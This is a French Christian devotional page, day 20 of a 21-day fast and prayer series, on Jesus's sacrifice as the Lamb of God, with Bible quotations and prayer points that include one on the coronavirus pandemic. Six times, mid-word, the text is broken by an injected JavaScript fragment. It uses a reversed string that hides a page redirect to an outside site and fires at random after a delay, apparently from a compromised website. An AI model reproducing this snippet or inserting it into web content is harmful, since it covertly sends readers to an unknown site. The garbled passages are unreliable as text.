21 jours de Jeûne et Prière : Jour 20

Le sacrifice de Jésus
Esaïe 53
«Voici l’Agneau de Dieu qui enlève le péché du monde. » Jean 1 : 29
En cette Semaine Sainte, les paroles de Jean-Baptiste à ses disciples résonnent dans nos cœurs. Dans le Nouveau Testament, Jésus est présenté comme l’Agneau de Dieu, annoncé et décrit dans Esaïe 53. Par son sang versé sur la croix, Il lave le péché du monde et achète la rédemption de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous ceux qui décident de croire en Lui.
De même l’apôtre Pierre nous dit : « Vous le savez en effet, ce n’est pas par des choses corruptibles comme l’argent ou l’or que vous avez été rachetés… mais par le sang précieux de Christ, qui s’est sacrifié comme un agneau sans défaut et sans tache. » (1 Pierre 1 : 18-19)
Jésus-Christ est le sacrifice par excellence, le seul qui a été accepté par un Dieu Juste et Saint. En vertu de la Justice de Dieu, le pécheur doit être châtié. Mais en vertu de sa Miséricorde, Dieu pourvoit un plan pour le pardon des péchés.
En effet, au Calvaire, la peine pour le péché a été payée et la loi divine honorée. Et grâce au sacrifice de Jésus-Christ, quiconque croit en Lui est pardonné et réconcilié avec Dieu comme il est dit : « nous avons par le sang de Jésus l’assurance d’un libre accès au sanctuaire. » (Hébreux 10 :19)
Mais, le sacrifice de Jésus ne nous a pas seulement sauvés, il nous a aussi donné la victobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toire sur l’ennemi
En effet, « Il a effacé l’acte dont les ordonnances nous condamnaient et qui subsistait contre nous, et il l’a détruit en le clouant à la croix ; Il a dépouillé les dominations et les autobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torités, et les a livrées publiquement en spectacle, en triomphant d’elles par la croix. » (Colossiens 2 : 14-15)
Ainsi, chaque fois que nous invoquons le sang de l’Agneau sur des circonstances ou des situations particulières pour lesquelles nous intercédons, nous rappelons aux puissances des ténèbres leur défaite sur la croix du Calvaire !

Sujets de prière
– Invoquons le sang de Jésus sur cette pandémie mondiale du coronavirus et proclamons qu’aucun virus n’est plus puissant que son sang versé pour nous !
– Proclamons la victobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toire sur la croix du Calvaire où Jésus a conquis notre salut, mais également notre guérison et notre délivrance des œuvres destructrices de l’ennemi.
– Qu’en cette Semaine Sainte il y ait une redécouverte de l’importance du sacrifice de Jésus.
– Que beaucoup de chrétiens reviennent à la Parole de Dieu.
– Invoquons le sang de l’Agneau pour purifier les cœurs ainsi que notre nation.
– Proclamons la puissance du sang de l’Agneau sur tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toute œuvre de l’ennemi et déclarons le triomphe de Christ !
Continuons de prier pour les autres sujets partagés tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tout au long de ces 21 jours.
Il est notre sacrifice parfait !